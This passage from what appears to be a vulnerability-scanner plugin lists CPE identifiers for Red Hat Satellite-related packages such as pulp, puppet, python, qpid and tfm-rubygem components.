value:\"p-cpe:/a:redhat:enterprise_linux:pulp-ostree-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-puppet-admin-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-puppet-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-puppet-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-rpm-admin-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-rpm-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pulpcore-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:puppet-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:puppet-agent-oauth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:puppet-foreman_scap_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:puppetlabs-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:puppetserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pycairo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-blinker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-bson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-gofer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-gofer-qpid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-imgcreate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-kid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-mongoengine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-nectar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-oauth2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-agent-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-client-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-docker-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-integrity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-oid_validation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-ostree-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-puppet-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-repoauth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-rpm-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pulp-streamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pymongo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-pymongo-gridfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-qpid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-qpid-proton\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-qpid-qmf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-saslwrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-semantic_version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-simplejson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-zope-interface\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-amqp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-ansible-runner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-anyjson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-billiard\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-celery\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-click\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-crane\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-django\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-flask\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-future\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-gobject\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-gobject-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-isodate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-itsdangerous\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-jinja2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-jmespath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-keycloak-httpd-client-install\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-kombu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-lockfile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-markupsafe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-okaara\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-pexpect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-psutil\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-ptyprocess\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-pycurl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-solv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-twisted\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-vine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-werkzeug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-aiodns\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-aiofiles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-aiohttp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-async-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-attrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-backoff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-cairo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-certifi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-cffi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-chardet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-click\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-createrepo_c\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-cryptography\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-dateutil\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-defusedxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-diff-match-patch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-django\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-django-currentuser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-django-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-django-guardian\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-django-import-export\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-django-lifecycle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-django-prometheus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-django-readonly-field\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-djangorestframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-djangorestframework-queryfields\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-drf-access-policy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-drf-nested-routers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-drf-spectacular\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-dynaconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-ecdsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-et-xmlfile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-future\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-gnupg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-gobject\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-gobject-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-gunicorn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-idna\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-idna-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-importlib-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-inflection\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-iniparse\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-jdcal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-jinja2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-jsonschema\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-libcomps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-markuppy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-markupsafe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-mongoengine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-multidict\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-odfpy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-openpyxl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-productmd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-prometheus-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-psycopg2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pulp-2to3-migration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pulp-certguard\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pulp-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pulp-file\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pulp-rpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pulpcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pyOpenSSL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pycares\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pycparser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pycryptodomex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pygtrie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pyjwkest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pyjwt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pymongo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pyrsistent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pytz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-pyyaml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-receptor-satellite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-redis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-requests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-rpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-rq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-semantic-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-six\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-solv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-sqlparse\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-subscription-manager-rhsm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-tablib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-typing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-typing-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-uritemplate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-url-normalize\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-urllib3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-urlman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-whitenoise\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-xlrd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-xlwt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-yarl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-zipp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-cpp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-cpp-client-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-cpp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-cpp-server-linearstore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-dispatch-router\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-dispatch-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-proton-c\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-qmf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qpid-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:receptor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:redhat-access-insights-puppet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:repoview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-postgresql12-postgresql-evr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhel8-kickstart-setup\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-facter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-fast_gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-foreman_scap_client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-highline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-oauth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-passenger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-passenger-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-passenger-native-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-rack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rubygem-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:saslwrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:satellite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:satellite-capsule\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:satellite-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:satellite-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:satellite-debug-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:satellite-installer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actioncable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actionmailbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actionmailer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actiontext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activejob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activerecord-import\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activerecord-session_store\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activestorage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-addressable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-algebrick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-amazing_print\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ancestry\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-anemone\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-angular-rails-templates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ansi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-apipie-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-apipie-dsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-apipie-params\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-apipie-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-audited\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_compute\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_resources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-azure_mgmt_subscriptions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-bcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-builder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-bundler_ext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-clamp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-coffee-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-coffee-script\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-coffee-script-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-concurrent-ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-concurrent-ruby-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-connection_pool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-crass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-css_parser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-daemons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-deacon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-declarative\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-declarative-option\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-deep_cloneable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-deface\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-diffy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-domain_name\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-dynflow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-erubi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-excon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-execjs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-facter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-faraday\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-faraday-cookie_jar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-faraday_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fast_gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-ffi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tfm-rubygem-fog-aws\");\n 